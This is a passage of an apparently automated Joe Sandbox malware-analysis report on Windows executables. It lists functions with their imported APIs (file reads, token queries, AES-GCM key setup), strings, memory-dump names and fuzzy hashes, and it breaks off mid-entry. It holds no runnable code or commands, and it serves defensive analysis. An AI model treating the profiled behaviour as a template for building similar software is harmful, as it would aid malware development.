Instruction ID: 200c62e71f7b90f76f6488fc0c887be3dcb6740cb0c6b8a9c4a6a871492c2aae
Opcode Fuzzy Hash: 6a84e7cc61d3f6faa1a02f0b285c9e89f06a54f244136a8e8d2e5cb925bd3053
Instruction Fuzzy Hash: C1117B31A1C94245EFA85B25A8C427A6661DF447F0F141734F57EC7AE5EE3CD4458B02

Function 00007FF6218BF908 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6218BF934
GetCurrentThreadId.KERNEL32 ref: 00007FF6218BF942
GetCurrentProcessId.KERNEL32 ref: 00007FF6218BF94E
QueryPerformanceCounter.KERNEL32 ref: 00007FF6218BF95E

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 4ffc0ff1ccd2cf120a16052376350404e0c91ed7b37e0d63ec5629fc76b72274
Instruction ID: 1a4fe514899efff0772f8805a1b2c14935f3d8116cd9e5192403f15b9381d6f5
Opcode Fuzzy Hash: 4ffc0ff1ccd2cf120a16052376350404e0c91ed7b37e0d63ec5629fc76b72274
Instruction Fuzzy Hash: 1811E826B18B028AEF008F60EC952A833A4FB59759F441A35EA6DC67A4DF7CD1648341

Function 00007FF6218C2E40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6218C2E6A

Strings

csm, xrefs: 00007FF6218C2E8F
csm, xrefs: 00007FF6218C2FFE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 4d7a57ad738694d133ebd4354881888b3b35db442aff29f4f0bd919a509eac2d
Instruction ID: f23b884f7bb55565591bc6ffddfa55f438afb16c9f39bf07dd29de8fe6c2face
Opcode Fuzzy Hash: 4d7a57ad738694d133ebd4354881888b3b35db442aff29f4f0bd919a509eac2d
Instruction Fuzzy Hash: CF71902250C69286DF689A25D8807797BA1EB44F84F148235EE4CD7ACACF3CD591C746

Function 00007FF6218C089C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6218C08C7
RtlUnwindEx.KERNEL32 ref: 00007FF6218C09B8

Strings

csm, xrefs: 00007FF6218C0945

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Unwind__except_validate_context_record
String ID: csm
API String ID: 2208346422-1018135373
Opcode ID: b6b4ec287b03b43af7135d47e4a928fccc53e45a76218f894a62c54d13e92dd1
Instruction ID: 4d6138c9b317ddd8ef240db56f4c969efd4fcc08d821652c3669abed947cda35
Opcode Fuzzy Hash: b6b4ec287b03b43af7135d47e4a928fccc53e45a76218f894a62c54d13e92dd1
Instruction Fuzzy Hash: 71518E2AB1D6028AEF588A19E884B787391EB44BD8F148331EA4EC77C5DE7CE841C701

Function 00007FF62188B100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF62188B16F
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF62188B1B7

Strings

bad locale name, xrefs: 00007FF62188B28C

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 14fc8944abe9429430bdcdd57e97276a4710787c9a614767eb9fa93c6d11781e
Instruction ID: a3341f5495cadd2859f086bf5dd20cf1f7dc4981d64fcbfb08645d189682ae8a
Opcode Fuzzy Hash: 14fc8944abe9429430bdcdd57e97276a4710787c9a614767eb9fa93c6d11781e
Instruction Fuzzy Hash: 8E514A32B09A418AEF64DF70E8902BC33A4EF85748F044035EA4DE7A96DF3CD4159386

Function 00007FF62185A600 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF62185A66F
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF62185A6B7

Strings

bad locale name, xrefs: 00007FF62185A796

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: b8865984b8349007d2158ad90dd57974622c70311bf235a09516d1c0c2a61c8a
Instruction ID: 8280a7e7500ec734f6a5c817f3ac271a254788b67b30ef01d8c4d0fa35598df0
Opcode Fuzzy Hash: b8865984b8349007d2158ad90dd57974622c70311bf235a09516d1c0c2a61c8a
Instruction Fuzzy Hash: AD514832B0AA419AEF54DF60E8D02A833B4EF44748F044135EA8EE7A96DF3CD5159396

Function 00007FF6218B2D58 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6218B8138: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B816B

_get_daylight.LIBCMT ref: 00007FF6218B2E70
_get_daylight.LIBCMT ref: 00007FF6218B2E81

Strings

?, xrefs: 00007FF6218B2E01

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 9cb3a800b4e5433171cdfee83524aba1d0ffe5a917aa16eb1e5a6d3dafcd7e64
Instruction ID: d26d78992338a1f64c0320ea70fecc2b95a5038cc3804d88d823a8959899cb58
Opcode Fuzzy Hash: 9cb3a800b4e5433171cdfee83524aba1d0ffe5a917aa16eb1e5a6d3dafcd7e64
Instruction Fuzzy Hash: 49411822A0C78646FF649726DC9137A6661EF80BA4F144235EE6CC6BD6DF3CE5818703

Function 00007FF6218C3530 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6218C35DA
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF6218C3603

Strings

csm, xrefs: 00007FF6218C3703

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 30dd612b4e4b9212e9166655247be16b5f23695bfc4863c6a6ebc2986465c29c
Instruction ID: 44f65c74eac0df352168d76ac084a4a7d0ac6d054ba907f92f81bd21fec1370a
Opcode Fuzzy Hash: 30dd612b4e4b9212e9166655247be16b5f23695bfc4863c6a6ebc2986465c29c
Instruction Fuzzy Hash: 51514E7661DB4586DB649B15E88026E77B4F789B90F100234EB8D87BD6DF3CE491CB02

Function 00007FF62186B198 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62186B382

Strings

iterator does not fit current value, xrefs: 00007FF62186B3C4
iterator out of range, xrefs: 00007FF62186B3F8

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: iterator does not fit current value$iterator out of range
API String ID: 3668304517-1046077056
Opcode ID: 6affba244214c4c3a40b9f3cceb322d260837b7171fc9adc847d2121be5ff106
Instruction ID: c31fae57a4494eb75675c6982df4e89cda627f2fdb32ca74e4a7b4bf2e817d94
Opcode Fuzzy Hash: 6affba244214c4c3a40b9f3cceb322d260837b7171fc9adc847d2121be5ff106
Instruction Fuzzy Hash: 14419FA3F0CAC69AEB11DB60D8942EC2771AB51748F945076CB0DC3AD6DE2CD55AC342

Function 00007FF62186B1F5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62186B382

Strings

iterator does not fit current value, xrefs: 00007FF62186B3C4
iterator out of range, xrefs: 00007FF62186B3F8

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: iterator does not fit current value$iterator out of range
API String ID: 3668304517-1046077056
Opcode ID: de55df384d362889a7b47a67d91106b8bd6c4af4cbcbe468fa2ef643749c4df5
Instruction ID: e1c25006bde62ebabd0bd1b755b34c017afe74897d8edf0c8f93f77523bd39cd
Opcode Fuzzy Hash: de55df384d362889a7b47a67d91106b8bd6c4af4cbcbe468fa2ef643749c4df5
Instruction Fuzzy Hash: 4F41AFA3F0CA869AEF15CB60DC942EC2370AB51748F90443ACB0DC3AD6DE3C955AC342

Function 00007FF6218ACC10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6218ACD27
GetLastError.KERNEL32 ref: 00007FF6218ACD49

Strings

U, xrefs: 00007FF6218ACCD3

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 136ebf252562798dd94b0934f5b608a87eddbdd1c89cb1577b5bf7720501d192
Instruction ID: acca7dac97e52e5424543109aed85763e6c38197890ca2530fe5127e2abf178c
Opcode Fuzzy Hash: 136ebf252562798dd94b0934f5b608a87eddbdd1c89cb1577b5bf7720501d192
Instruction Fuzzy Hash: 3E41A022B1DA4586EF608F25E8843AA67A1FB98794F444031EF4EC7794EF7CD541C742

Function 00007FF6218C0E88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6218CC3D2), ref: 00007FF6218C0ED8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6218CC3D2), ref: 00007FF6218C0F19

Strings

csm, xrefs: 00007FF6218C0F06

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b70c8f01ca01e1ec4819aea0aadbf8579bb2f3e39c9b562f706c3da26c2f4cc1
Instruction ID: 9b4e05c971ef30a54c0c43fc35d7662c5f57d4944af2de245271e569e6252085
Opcode Fuzzy Hash: b70c8f01ca01e1ec4819aea0aadbf8579bb2f3e39c9b562f706c3da26c2f4cc1
Instruction Fuzzy Hash: 44112B3661DB8182EB658F15E880269B7E4FB88B88F584234EB8D87B95DF3CD5518B01

Analysis Process: ochicikt.z2z.exePID: 7480, Parent PID: 6988COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	175
Total number of Limit Nodes:	11

Executed Functions

Function 00007FF741ABF020 Relevance: 21.5, APIs: 8, Strings: 4, Instructions: 500
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileSize.KERNEL32 ref: 00007FF741ABF261
SetFilePointer.KERNEL32 ref: 00007FF741ABF314
ReadFile.KERNEL32 ref: 00007FF741ABF343
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741ABF7D7
GetCurrentProcess.KERNEL32 ref: 00007FF741ABF85B
OpenProcessToken.ADVAPI32 ref: 00007FF741ABF86E
GetTokenInformation.KERNELBASE ref: 00007FF741ABF8AA
CloseHandle.KERNELBASE ref: 00007FF741ABF8CB

Strings

ios_base::badbit set, xrefs: 00007FF741ABF771, 00007FF741ABF7EF
ios_base::eofbit set, xrefs: 00007FF741ABF784
exists, xrefs: 00007FF741ABF7CA
ios_base::failbit set, xrefs: 00007FF741ABF77D

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: File$ProcessToken$CloseCurrentHandleInformationOpenPointerReadSize_invalid_parameter_noinfo_noreturn
String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4160272566-15404121
Opcode ID: 15eefc81862674bbd5432f59fcd4cfc46ae7ea89a5f19d39114f2d3f21ccb52c
Instruction ID: 2406268a1b7b406b5fbb1ef74a2dc79cef4384160c5d5dc9bd12c35bfa36144a
Opcode Fuzzy Hash: 15eefc81862674bbd5432f59fcd4cfc46ae7ea89a5f19d39114f2d3f21ccb52c
Instruction Fuzzy Hash: 97422722B18BC5C9EB21EF24D8807ED77A1FB45788F848226DB4D47A59EFB8D544C720

Function 00007FF741ADDA30 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF741ADA0C6,?,?,-2723E8D8DEBC5093,00007FF741AD4E71,?,?,?,?,00007FF741ADD3FC), ref: 00007FF741ADDA85

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
Instruction ID: 93b7fdb54f9670b0a1f53391da6a96336b16761e2e25dfd3c02693c8b221df0c
Opcode Fuzzy Hash: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
Instruction Fuzzy Hash: 4CF06244B0DB07C0FF5677615440BB482921F88B40FCCD432C82E467E2EE9CE4808231

Non-executed Functions

Function 00007FF741AB02C0 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 410COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF741AB0474
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF741AB0482
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF741AB0705
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF741AB0713
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB08B0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB08B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB08D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB08DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB08E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB0908
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB090E

Strings

value, xrefs: 00007FF741AB039A, 00007FF741AB0633

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
String ID: value
API String ID: 1346393832-494360628
Opcode ID: ebc0e3981c635e5e4552e56bb592ad09c64881295adfc100063cc437d6a78c7c
Instruction ID: 08610d8e3bdac71c20125cc4e33957b192234e9f6def5a56c3c60f0a4791a7a0
Opcode Fuzzy Hash: ebc0e3981c635e5e4552e56bb592ad09c64881295adfc100063cc437d6a78c7c
Instruction Fuzzy Hash: 0502A622B1CBC1C5EB02FB74D5406BDA761EB857A4F905232FA9D02AD9DFACD184C760

Function 00007FF741AB8440 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT ref: 00007FF741AB84D8
BCryptSetProperty.BCRYPT ref: 00007FF741AB8502
BCryptGenerateSymmetricKey.BCRYPT ref: 00007FF741AB853B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB8557
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741AB865B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741AB8661

Strings

AES, xrefs: 00007FF741AB84CD
ChainingModeGCM, xrefs: 00007FF741AB84F0
ChainingMode, xrefs: 00007FF741AB84F7

Memory Dump Source

Source File: 0000001B.00000002.1919953866.00007FF741A41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF741A40000, based on PE: true

Associated: 0000001B.00000002.1919924630.00007FF741A40000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920049989.00007FF741B15000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920120727.00007FF741B70000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920151052.00007FF741B72000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920180659.00007FF741B75000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000001B.00000002.1920209968.00007FF741B78000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff741a40000_ochicikt.jbxd

Similarity

API ID: Crypt$_invalid_parameter_noinfo_noreturn$AlgorithmConcurrency::cancel_current_taskGenerateOpenPropertyProviderSymmetric
String ID: AES$ChainingMode$ChainingModeGCM
API String ID: 2556340343-1213888626
Opcode ID: 2f93fa658ab62ec42cfbb3c26b26e2d855b243945e500da0077e5e98140ac5da
Instruction ID: 0974b8a431cb731e02504845f66f15148c1d67cad151a14e72dcb46a31a54d33
Opcode Fuzzy Hash: 2f93fa658ab62ec42cfbb3c26b26e2d855b243945e500da0077e5e98140ac5da
Instruction Fuzzy Hash: DA61C362B4C785C5EB16BB25A440B79A350EB45BD8F944632EF5C07AD5DFBCD4818320

Function 00007FF741A91AF0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF741A91D4E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A91DE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A91DE9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A91DEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A91DF5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741A91DFB

Strings

parse_error, xrefs: 00007FF741A91B7E

Memory Dump Source

